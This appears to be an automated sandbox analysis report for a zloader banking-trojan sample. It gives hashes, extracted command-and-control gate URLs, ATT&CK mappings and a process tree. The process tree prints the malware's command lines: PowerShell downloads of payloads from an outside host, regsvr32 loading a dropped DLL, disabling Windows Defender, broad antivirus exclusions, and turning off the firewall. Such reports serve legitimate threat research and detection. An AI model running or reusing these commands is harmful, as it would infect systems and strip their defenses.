zloader | 6c8e5f1670515c6a9d3cdcafe6d9a782a87f0f085095558cc0116ea73281c059

Analysis

max time kernel
55s
max time network
141s
platform
windows10_x64
resource
win10v20210408
submitted
06-08-2021 06:34

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

aac2b6314988e0aea824fe0a53b917c1.exe
Size

165KB
MD5

aac2b6314988e0aea824fe0a53b917c1
SHA1

17c0d629b7a2f940e7a69f1120582cf89f70355a
SHA256

6c8e5f1670515c6a9d3cdcafe6d9a782a87f0f085095558cc0116ea73281c059
SHA512

0245fb86597e7106ef24a7348b9251fbf3936ff3643f372bea90b0c736c1275695012ce699d47c709597c1972c6a2af977507ba7378eefa5a73afeea48559715

Score

10^/10

zloader vasja vasja botnet evasion persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 2776 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

3352 regsvr32.exe

flow	pid	process
8	2776	powershell.exe

pid	process
3352	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

aac2b6314988e0aea824fe0a53b917c1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	aac2b6314988e0aea824fe0a53b917c1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	aac2b6314988e0aea824fe0a53b917c1.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2776 powershell.exe
2776 powershell.exe
2776 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2776 powershell.exe

pid	process
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2776	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

aac2b6314988e0aea824fe0a53b917c1.execmd.exeregsvr32.exe

description	pid	process	target process
PID 904 wrote to memory of 2356	904	aac2b6314988e0aea824fe0a53b917c1.exe	cmd.exe
PID 904 wrote to memory of 2356	904	aac2b6314988e0aea824fe0a53b917c1.exe	cmd.exe
PID 2356 wrote to memory of 2776	2356	cmd.exe	powershell.exe
PID 2356 wrote to memory of 2776	2356	cmd.exe	powershell.exe
PID 2356 wrote to memory of 1996	2356	cmd.exe	regsvr32.exe
PID 2356 wrote to memory of 1996	2356	cmd.exe	regsvr32.exe
PID 1996 wrote to memory of 3352	1996	regsvr32.exe	regsvr32.exe
PID 1996 wrote to memory of 3352	1996	regsvr32.exe	regsvr32.exe
PID 1996 wrote to memory of 3352	1996	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\aac2b6314988e0aea824fe0a53b917c1.exe
"C:\Users\Admin\AppData\Local\Temp\aac2b6314988e0aea824fe0a53b917c1.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\SYSTEM32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:2356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/JavaE.dll -OutFile JavaE.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776

C:\Windows\system32\regsvr32.exe
regsvr32 JavaE.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\SysWOW64\regsvr32.exe
JavaE.dll
4⤵
- Loads dropped DLL
PID:3352

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:3568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:3384

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:3004

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:2776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/javase.exe -OutFile javase.exe
4⤵
PID:2812

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:3316

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
4⤵
PID:1108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
4⤵
PID:2656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
4⤵
PID:1192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
4⤵
PID:3996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
4⤵
PID:192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
4⤵
PID:640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
4⤵
PID:1748

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
5⤵
PID:3596

C:\Windows\system32\shutdown.exe
shutdown.exe /r /t 00
4⤵
PID:2004

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ad1055 /state1:0x41c64e6d
1⤵
PID:1788

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1a9a7d34439c968aa0dcc5bbe028441a

SHA1
531ca703aac8e89bf1b5547a7b3c67985c157177

SHA256
501ece8f66a89d3b663c0638cd089f16892b0d0a7b9deba8a19b94c050c59322

SHA512
fb28e484588c7bdb8d2c2a2659b4f575d8d974f1a8c5988f9accb3f54cd315c1f47b8fa4c8c68db97a08aefd8e31904cc4e615a5dcced01fd36776912391918f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
dfc2cbfac8e6fc62453503fa3d2d8071

SHA1
1a4b91770a277f470474bfe7463a28ba52ac2179

SHA256
56ac94db2f239a143055afb6c97539418c109e0ae1ed1bb2420fe5182ebd210a

SHA512
86b999f5cfa631e8b6e1273b03c8c95e9778b3d1b46b18797a9c85d2502129c168ef8d7ec7eb3cfe39e2e85b6fbee5d032f71e6a964d51474a616428b19d2c2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
848d9f4069843af427ab7d2b7bc1aa09

SHA1
6ee32d3706f7c6dfc91f14e93cb312983c473ff2

SHA256
c8fd7e3affcc8292b22036907b62ce9b823cf08a28c9edd24642f0ee6dc365c4

SHA512
f21fe0ed39ba928dcc180f207a7fe42df9d8335a28579c7db367d3a38c093c59da64e87add384c199072cc754cf358ff68843db56713f83c60679d4afaa8efd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e4e24c989bd707d1e92cedbb81f5f64f

SHA1
cc47e521cbe4ddbe557b673083f9d63996153c49

SHA256
4773ca5962a36c1b6039697343c79c6f52506c34e097da75280487a6bc436948

SHA512
5d5a2444c7075681767c494e392b90de95b7c738d47223cb484aa0dbe98d3d61fb6adee086be1c7f9058788c82c663df337d24595e5c51680f737325f460159a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
b6bc8ad9b6df524986a829c78d86794f

SHA1
9b41f2d5f6602be188d5766acb4c80fe96ca1f21

SHA256
4c284fba0655465046427e7662c7f8626445680aa4f6a6dcf9f1238007e7a78a

SHA512
5403e7ce8cd76bb783a8729771531adb0e691bbc86972f6df4e0c6c62c69634e80b02e51131fa5444da7bef4d2c3e3f973d7b24f673c626fc6ea5bfc8b058dcb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
64eeded1c389dffe6fa81e8911d0ddda

SHA1
b75b9fa78c20fe60ed0b8a42dd4eb091c13ffcaf

SHA256
429b624c85b9facd96212baed9ced3218b463cc531b49bab35a60222eaecab3f

SHA512
a46dec86e2705962468e38106015066ffa294af320d8a03029325836451465a9eafe48cf41da4448b57c901c27296e432dfc021c2f0dd48f14cf96f946971d44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
eb798c4c0456b063aadf7b0929178072

SHA1
7919c28352014d26518d610211f2d759f382cb97

SHA256
2ac12768353bfedb81d33a174b15db679e8c7df52b669e1eeb463c911542775e

SHA512
138164b01bd55430f7c499c5754c6333b1899294e28c0d4240c7394cf070201fe8a5d00e2b3f021be5458eadcc31d00486eaa86fda0dd5b45a7d5be9ac5050bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c27cb9e2ba30feed0db6433aea9d3443

SHA1
4684a84fd4412f8ffd994cc63f84981624ca276f

SHA256
986cbf20cb268aea8cbdbd7fb399ab01bfae0237696bd539d4ccb7f241922b3d

SHA512
9f47bf47949822a4a74835f1c9962f377ea7b1ff74d0ca87dc194e125ff37e39564d1e458b6b6de088b5b832223589eb46f2e8333d141ec8ec99d114d9b91504

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4f7f7caf7e85806b7af2084498eb8e86

SHA1
6b3935c36e4492a03e49c3de851900d494b7ccd7

SHA256
fed79d053e9abe45e065e11bc98e8b112dcfa9c116437639ec548619fb86e743

SHA512
b6d0fa0626e18d84bd9ce8753af49be94cc418dbe801c2af1f73cf46c3271d63fb58b807c6d3de25bffff73e09bccf431a251ef58e84df731a4644cab6e6821c

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
eec559fabd6ec7024f586fb3a1754fac

SHA1
f7498a978c2ed501a3b5d8478cdbd60a72a2d60a

SHA256
30892cefd5d62af5c37c7b431c0c03cd90c8bcb795d4c7c0db97b087e2cdf4be

SHA512
8010da9eb8b00079411aff2bbca28e0d778c3a9fdd1fe299d0f42d61f435e161af54e14079ad3dbbfa9b0592817d453f1305b91879cd5e8f4a6968481e20ee17

Download Submit
C:\Users\Admin\AppData\Roaming\JavaE.dll
MD5
86cef6c066a05b3f67123fbf638b6b01

SHA1
81618f8ecc48541c219aa974e4b16cab8f34203b

SHA256
86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

SHA512
1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
06005e9cf3aec2b86a3be78623683b46

SHA1
f7e3d83dd9466eeb8b7e4cf3322a08e757a6b63a

SHA256
1f9e24e527f702f5f4a7f65a776df38b2d4240d8e3f13713045cab3466746272

SHA512
bb99a6ad1da80692a12f9079bf3be80bd656fa4eb4aef59b1a64affebc5b8a95525c0ebed1bd186cf30493cbba85fc49d1093472bdc3027608daa05fde302323

Download Submit
\Users\Admin\AppData\Roaming\JavaE.dll
MD5
86cef6c066a05b3f67123fbf638b6b01

SHA1
81618f8ecc48541c219aa974e4b16cab8f34203b

SHA256
86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

SHA512
1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

Download Submit
memory/192-390-0x0000026D6F216000-0x0000026D6F218000-memory.dmp

Filesize
8KB

Download
memory/192-372-0x0000000000000000-mapping.dmp

Download
memory/192-386-0x0000026D6F210000-0x0000026D6F212000-memory.dmp

Filesize
8KB

Download
memory/192-387-0x0000026D6F213000-0x0000026D6F215000-memory.dmp

Filesize
8KB

Download
memory/192-412-0x0000026D6F218000-0x0000026D6F219000-memory.dmp

Filesize
4KB

Download
memory/640-414-0x0000000000000000-mapping.dmp

Download
memory/640-428-0x000002549ABE0000-0x000002549ABE2000-memory.dmp

Filesize
8KB

Download
memory/640-429-0x000002549ABE3000-0x000002549ABE5000-memory.dmp

Filesize
8KB

Download
memory/640-454-0x000002549ABE8000-0x000002549ABE9000-memory.dmp

Filesize
4KB

Download
memory/640-453-0x000002549ABE6000-0x000002549ABE8000-memory.dmp

Filesize
8KB

Download
memory/1108-238-0x0000026B7B886000-0x0000026B7B888000-memory.dmp

Filesize
8KB

Download
memory/1108-216-0x0000026B7B883000-0x0000026B7B885000-memory.dmp

Filesize
8KB

Download
memory/1108-214-0x0000026B7B880000-0x0000026B7B882000-memory.dmp

Filesize
8KB

Download
memory/1108-205-0x0000000000000000-mapping.dmp

Download
memory/1192-342-0x000001D0C0348000-0x000001D0C0349000-memory.dmp

Filesize
4KB

Download
memory/1192-323-0x000001D0C0340000-0x000001D0C0342000-memory.dmp

Filesize
8KB

Download
memory/1192-324-0x000001D0C0343000-0x000001D0C0345000-memory.dmp

Filesize
8KB

Download
memory/1192-288-0x0000000000000000-mapping.dmp

Download
memory/1192-325-0x000001D0C0346000-0x000001D0C0348000-memory.dmp

Filesize
8KB

Download
memory/1748-470-0x000001CD65B73000-0x000001CD65B75000-memory.dmp

Filesize
8KB

Download
memory/1748-456-0x0000000000000000-mapping.dmp

Download
memory/1748-469-0x000001CD65B70000-0x000001CD65B72000-memory.dmp

Filesize
8KB

Download
memory/1748-473-0x000001CD65B76000-0x000001CD65B78000-memory.dmp

Filesize
8KB

Download
memory/1996-139-0x0000000000000000-mapping.dmp

Download
memory/2004-474-0x0000000000000000-mapping.dmp

Download
memory/2356-114-0x0000000000000000-mapping.dmp

Download
memory/2656-246-0x0000000000000000-mapping.dmp

Download
memory/2656-287-0x000001E5BE988000-0x000001E5BE989000-memory.dmp

Filesize
4KB

Download
memory/2656-260-0x000001E5BE983000-0x000001E5BE985000-memory.dmp

Filesize
8KB

Download
memory/2656-258-0x000001E5BE980000-0x000001E5BE982000-memory.dmp

Filesize
8KB

Download
memory/2656-279-0x000001E5BE986000-0x000001E5BE988000-memory.dmp

Filesize
8KB

Download
memory/2776-116-0x0000000000000000-mapping.dmp

Download
memory/2776-128-0x000001FE11090000-0x000001FE11092000-memory.dmp

Filesize
8KB

Download
memory/2776-176-0x0000000000000000-mapping.dmp

Download
memory/2776-129-0x000001FE11093000-0x000001FE11095000-memory.dmp

Filesize
8KB

Download
memory/2776-127-0x000001FE2B5C0000-0x000001FE2B5C1000-memory.dmp

Filesize
4KB

Download
memory/2776-122-0x000001FE2B410000-0x000001FE2B411000-memory.dmp

Filesize
4KB

Download
memory/2776-137-0x000001FE11096000-0x000001FE11098000-memory.dmp

Filesize
8KB

Download
memory/2812-194-0x000002BC21590000-0x000002BC21592000-memory.dmp

Filesize
8KB

Download
memory/2812-177-0x0000000000000000-mapping.dmp

Download
memory/2812-196-0x000002BC21596000-0x000002BC21598000-memory.dmp

Filesize
8KB

Download
memory/2812-195-0x000002BC21593000-0x000002BC21595000-memory.dmp

Filesize
8KB

Download
memory/3004-173-0x0000000000000000-mapping.dmp

Download
memory/3316-201-0x0000000000000000-mapping.dmp

Download
memory/3352-144-0x0000000010000000-0x0000000010148000-memory.dmp

Filesize
1.3MB

Download
memory/3352-143-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3352-141-0x0000000000000000-mapping.dmp

Download
memory/3384-164-0x0000023BB7BE0000-0x0000023BB7BE2000-memory.dmp

Filesize
8KB

Download
memory/3384-149-0x0000000000000000-mapping.dmp

Download
memory/3384-175-0x0000023BB7BE6000-0x0000023BB7BE8000-memory.dmp

Filesize
8KB

Download
memory/3384-165-0x0000023BB7BE3000-0x0000023BB7BE5000-memory.dmp

Filesize
8KB

Download
memory/3568-145-0x0000000000000000-mapping.dmp

Download
memory/3568-148-0x00000000004F0000-0x0000000000516000-memory.dmp

Filesize
152KB

Download
memory/3596-471-0x0000000000000000-mapping.dmp

Download
memory/3692-203-0x0000000000000000-mapping.dmp

Download
memory/3996-370-0x0000022CFA508000-0x0000022CFA509000-memory.dmp

Filesize
4KB

Download
memory/3996-369-0x0000022CFA506000-0x0000022CFA508000-memory.dmp

Filesize
8KB

Download
memory/3996-344-0x0000022CFA503000-0x0000022CFA505000-memory.dmp

Filesize
8KB

Download
memory/3996-343-0x0000022CFA500000-0x0000022CFA502000-memory.dmp

Filesize
8KB

Download
memory/3996-329-0x0000000000000000-mapping.dmp

Download